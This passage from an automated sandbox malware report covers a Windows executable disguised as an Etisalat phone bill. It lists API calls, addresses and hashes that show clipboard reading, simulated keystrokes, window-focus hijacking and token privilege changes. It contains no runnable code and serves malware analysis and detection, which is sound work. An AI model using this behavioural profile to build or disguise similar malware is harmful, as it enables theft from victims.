                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: LongNamePath_memmove
                                      • String ID:
                                      • API String ID: 2514874351-0
                                      • Opcode ID: e0f8e5244de58b87792ddf9071efd643aeadd9c9e7c30178a4d5e8d5fe98a8ce
                                      • Instruction ID: 73d61c5da2991b248fe2f5b0532f0803f54c84f049e6db2e8fbb81c9d72cd8fe
                                      • Opcode Fuzzy Hash: e0f8e5244de58b87792ddf9071efd643aeadd9c9e7c30178a4d5e8d5fe98a8ce
                                      • Instruction Fuzzy Hash: DFE0CD7694422957C720D65C9C05FFA77EDDF88790F0401F5FD0CD7205DD649C818690
                                      Function 00BC9129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __fread_nolock
                                      • String ID:
                                      • API String ID: 2638373210-0
                                      • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                      • Instruction ID: 0d1ff865a50bd9447b498b3aca4615f190d70a8c7a9731e402aef5d84fe40a3a
                                      • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                      • Instruction Fuzzy Hash: 52E092B0104B005FEB348A24D815BE373E0FB06315F04085DF29A93341EB627841C759
                                      Function 00B65DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00B9E16B,?,?,00000000), ref: 00B65DBF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: 7a2eb84133cdc0ee860c1fc0ec5a6712919461b0c364a8c50a725e61674145a7
                                      • Instruction ID: fcf7c16829342997747424d64ebba5f65227aa25eaa6fe3a2b532aa73c5f4419
                                      • Opcode Fuzzy Hash: 7a2eb84133cdc0ee860c1fc0ec5a6712919461b0c364a8c50a725e61674145a7
                                      • Instruction Fuzzy Hash: 34D0C77464020CBFE710DB80DC46FA9777CD745711F100194FD0467290D6B27E508795
                                      Function 00B8548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __wfsopen
                                      • String ID:
                                      • API String ID: 197181222-0
                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                      • Instruction ID: 676a8026aeab2d1dc5708039eef9c05f9a619a5b50ac4df967779821ce469627
                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                      • Instruction Fuzzy Hash: 1BB0927684020C77DF122E82EC02A593B599B40678F848060FB0C18272A673A6A09689
                                      Function 00BCD2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(00000002,00000000), ref: 00BCD46A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ErrorLast
                                      • String ID:
                                      • API String ID: 1452528299-0
                                      • Opcode ID: c5547daba5753be94248aa351f3310de90493a56abc767da7f8a8d669f0c9049
                                      • Instruction ID: 7d638e74e57fd01076f3f3deb4323e82b557540c6d12ad1b6886c1853d00d851
                                      • Opcode Fuzzy Hash: c5547daba5753be94248aa351f3310de90493a56abc767da7f8a8d669f0c9049
                                      • Instruction Fuzzy Hash: 95712B342087028FC714EF64C491F6AB7E5EF98314F0449ADF9969B2A2DB34ED49CB52
                                      Function 00B80E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction ID: a138df2196c5f94bc6d207b64e00c901af169ca25d5e363b2fd226ac700e46ec
                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction Fuzzy Hash: 4B31C170A10106DFC7A8EE58C48096AF7E6FF59381B648AE5E409CB661D731EDC5CB80
                                      Function 015E2300 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNELBASE(000001F4), ref: 015E2311
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977906262.00000000015E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_15e0000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction ID: 4bab0476ee891a5ace27e095468c2043b10f2def949ae145667f434bf02f8626
                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction Fuzzy Hash: 4BE0BF7594010D9FDB00EFB4D54969E7BB4EF04301F100561FD0192281D63099508A62

                                      Non-executed Functions

                                      Function 00BECDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B62612: GetWindowLongW.USER32(?,000000EB), ref: 00B62623
                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00BECE50
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BECE91
                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00BECED6
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BECF00
                                      • SendMessageW.USER32 ref: 00BECF29
                                      • _wcsncpy.LIBCMT ref: 00BECFA1
                                      • GetKeyState.USER32(00000011), ref: 00BECFC2
                                      • GetKeyState.USER32(00000009), ref: 00BECFCF
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BECFE5
                                      • GetKeyState.USER32(00000010), ref: 00BECFEF
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BED018
                                      • SendMessageW.USER32 ref: 00BED03F
                                      • SendMessageW.USER32(?,00001030,?,00BEB602), ref: 00BED145
                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00BED15B
                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00BED16E
                                      • SetCapture.USER32(?), ref: 00BED177
                                      • ClientToScreen.USER32(?,?), ref: 00BED1DC
                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00BED1E9
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BED203
                                      • ReleaseCapture.USER32 ref: 00BED20E
                                      • GetCursorPos.USER32(?), ref: 00BED248
                                      • ScreenToClient.USER32(?,?), ref: 00BED255
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BED2B1
                                      • SendMessageW.USER32 ref: 00BED2DF
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00BED31C
                                      • SendMessageW.USER32 ref: 00BED34B
                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00BED36C
                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00BED37B
                                      • GetCursorPos.USER32(?), ref: 00BED39B
                                      • ScreenToClient.USER32(?,?), ref: 00BED3A8
                                      • GetParent.USER32(?), ref: 00BED3C8
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BED431
                                      • SendMessageW.USER32 ref: 00BED462
                                      • ClientToScreen.USER32(?,?), ref: 00BED4C0
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00BED4F0
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00BED51A
                                      • SendMessageW.USER32 ref: 00BED53D
                                      • ClientToScreen.USER32(?,?), ref: 00BED58F
                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00BED5C3
                                        • Part of subcall function 00B625DB: GetWindowLongW.USER32(?,000000EB), ref: 00B625EC
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00BED65F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                      • String ID: @GUI_DRAGID$F
                                      • API String ID: 3977979337-4164748364
                                      • Opcode ID: 84b039a1bec7187f1725c013bd2660f8cfca9ba25348e54bbb960869c245debe
                                      • Instruction ID: 8e02ae319c73f1359dd0d1dc7cfe04d5750762b2bf4e76a26d7ac40952aef51c
                                      • Opcode Fuzzy Hash: 84b039a1bec7187f1725c013bd2660f8cfca9ba25348e54bbb960869c245debe
                                      • Instruction Fuzzy Hash: D742AE70204281AFDB25CF29C884FAABFE5FF48314F1405ADF695872A1CB71E955CB92
                                      Function 00BE804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00BE873F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: %d/%02d/%02d
                                      • API String ID: 3850602802-328681919
                                      • Opcode ID: 0ecffe4ae73bcfd98773c593f77d94e41c1f473a7c30f2d96b420b00fea6ae8e
                                      • Instruction ID: cfeeb658f613686862038004a51b75e6eb982a515c524875fa6e6d1ec25ab8cc
                                      • Opcode Fuzzy Hash: 0ecffe4ae73bcfd98773c593f77d94e41c1f473a7c30f2d96b420b00fea6ae8e
                                      • Instruction Fuzzy Hash: DD12C071500685AFEB259F65CC89FAA7BF8EF49710F2041A9F919EB2E1DF708941CB10
                                      Function 00B7710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memmove$_memset
                                      • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                      • API String ID: 1357608183-1798697756
                                      • Opcode ID: 2cee2469f4270c8f036cb17ea6f066c6bd91468efb0329b63956f1a3a585e23f
                                      • Instruction ID: 4eab8ff1c0f5da93c14d6953d9f4c0844dce8174e5008462bb515c2f67c3e471
                                      • Opcode Fuzzy Hash: 2cee2469f4270c8f036cb17ea6f066c6bd91468efb0329b63956f1a3a585e23f
                                      • Instruction Fuzzy Hash: 60939171A402159FDB24CF58C891BFDB7F1FF48710F2585AAE959AB281E7B09E81CB40
                                      Function 00B64A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32(00000000,?), ref: 00B64A3D
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B9DA8E
                                      • IsIconic.USER32(?), ref: 00B9DA97
                                      • ShowWindow.USER32(?,00000009), ref: 00B9DAA4
                                      • SetForegroundWindow.USER32(?), ref: 00B9DAAE
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B9DAC4
                                      • GetCurrentThreadId.KERNEL32 ref: 00B9DACB
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B9DAD7
                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B9DAE8
                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B9DAF0
                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 00B9DAF8
                                      • SetForegroundWindow.USER32(?), ref: 00B9DAFB
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B9DB10
                                      • keybd_event.USER32(00000012,00000000), ref: 00B9DB1B
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B9DB25
                                      • keybd_event.USER32(00000012,00000000), ref: 00B9DB2A
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B9DB33
                                      • keybd_event.USER32(00000012,00000000), ref: 00B9DB38
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B9DB42
                                      • keybd_event.USER32(00000012,00000000), ref: 00B9DB47
                                      • SetForegroundWindow.USER32(?), ref: 00B9DB4A
                                      • AttachThreadInput.USER32(?,?,00000000), ref: 00B9DB71
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 4125248594-2988720461
                                      • Opcode ID: bc8289bb7b3e582c9aa69602357e8886276a7f3d7ee8da2f84adc169b9c00d0d
                                      • Instruction ID: 0caccc3078182ebf4fec0554df0de036cbd788a11e83403adee3d365c12470d4
                                      • Opcode Fuzzy Hash: bc8289bb7b3e582c9aa69602357e8886276a7f3d7ee8da2f84adc169b9c00d0d
                                      • Instruction Fuzzy Hash: 59316471A40358BFEF205FA29C89F7F3EACEB54B50F114075FA04AB1D1CA715D10AAA0
                                      Function 00BB8858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00BB8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BB8D0D
                                        • Part of subcall function 00BB8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BB8D3A
                                        • Part of subcall function 00BB8CC3: GetLastError.KERNEL32 ref: 00BB8D47
                                      • _memset.LIBCMT ref: 00BB889B
                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00BB88ED
                                      • CloseHandle.KERNEL32(?), ref: 00BB88FE
                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00BB8915
                                      • GetProcessWindowStation.USER32 ref: 00BB892E
                                      • SetProcessWindowStation.USER32(00000000), ref: 00BB8938
                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00BB8952
                                        • Part of subcall function 00BB8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00BB8851), ref: 00BB8728
                                        • Part of subcall function 00BB8713: CloseHandle.KERNEL32(?,?,00BB8851), ref: 00BB873A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                      • String ID: $default$winsta0
                                      • API String ID: 2063423040-1027155976
                                      • Opcode ID: 8e544e80880242e573171cd77ec323aa3890cf038fd310b718952b5a26331a23
                                      • Instruction ID: 0720e2fb4574d5ab20ca9510dc99a313f1e6a18b0f6ec2c61284f137002129a5
                                      • Opcode Fuzzy Hash: 8e544e80880242e573171cd77ec323aa3890cf038fd310b718952b5a26331a23
                                      • Instruction Fuzzy Hash: 07810571901249AFDF119FA4DC85AFEBBBDEF04304F1841AAF910A6161DFB18E15DB60
                                      Function 00BD425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenClipboard.USER32(00BEF910), ref: 00BD4284
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00BD4292
                                      • GetClipboardData.USER32(0000000D), ref: 00BD429A
                                      • CloseClipboard.USER32 ref: 00BD42A6
                                      • GlobalLock.KERNEL32(00000000), ref: 00BD42C2
                                      • CloseClipboard.USER32 ref: 00BD42CC
                                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00BD42E1
                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00BD42EE
                                      • GetClipboardData.USER32(00000001), ref: 00BD42F6
                                      • GlobalLock.KERNEL32(00000000), ref: 00BD4303
                                      • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00BD4337
                                      • CloseClipboard.USER32 ref: 00BD4447
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                      • String ID:
                                      • API String ID: 3222323430-0
                                      • Opcode ID: e6852b62154b0c0908e1e703518da9ffb92a4a7e14594d40969b1f7d0d2c6945
                                      • Instruction ID: 093c8a7526d056b21c4132665630b59cfb657594969188f5c3165f2dd5b4e3c6
                                      • Opcode Fuzzy Hash: e6852b62154b0c0908e1e703518da9ffb92a4a7e14594d40969b1f7d0d2c6945
                                      • Instruction Fuzzy Hash: 3C518D35204242AFD711AB60DCD6F7EB7E8EB84B00F0445AAF596D72A1EF74D904CA62
                                      Function 00BCC9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00BCC9F8
                                      • FindClose.KERNEL32(00000000), ref: 00BCCA4C
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BCCA71
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BCCA88
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00BCCAAF
                                      • __swprintf.LIBCMT ref: 00BCCAFB
                                      • __swprintf.LIBCMT ref: 00BCCB3E
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                      • __swprintf.LIBCMT ref: 00BCCB92
                                        • Part of subcall function 00B838D8: __woutput_l.LIBCMT ref: 00B83931
                                      • __swprintf.LIBCMT ref: 00BCCBE0
                                        • Part of subcall function 00B838D8: __flsbuf.LIBCMT ref: 00B83953
                                        • Part of subcall function 00B838D8: __flsbuf.LIBCMT ref: 00B8396B
                                      • __swprintf.LIBCMT ref: 00BCCC2F
                                      • __swprintf.LIBCMT ref: 00BCCC7E
                                      • __swprintf.LIBCMT ref: 00BCCCCD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                      • API String ID: 3953360268-2428617273
                                      • Opcode ID: 62caaa0087c48177026fc889de5979311a8ca9d34903eb1a0b71687cb4aff47b
                                      • Instruction ID: ea9cd499aab230bf2b5fcc457f06a29ec58124f203b35b6204e4778197e3e39a
                                      • Opcode Fuzzy Hash: 62caaa0087c48177026fc889de5979311a8ca9d34903eb1a0b71687cb4aff47b
                                      • Instruction Fuzzy Hash: 77A11DB2508345ABC710EBA4C895DAFB7ECFF94704F44496DF586C7191EA38DA08CB62
                                      Function 00BCF200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00BCF221
                                      • _wcscmp.LIBCMT ref: 00BCF236
                                      • _wcscmp.LIBCMT ref: 00BCF24D
                                      • GetFileAttributesW.KERNEL32(?), ref: 00BCF25F
                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00BCF279
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00BCF291
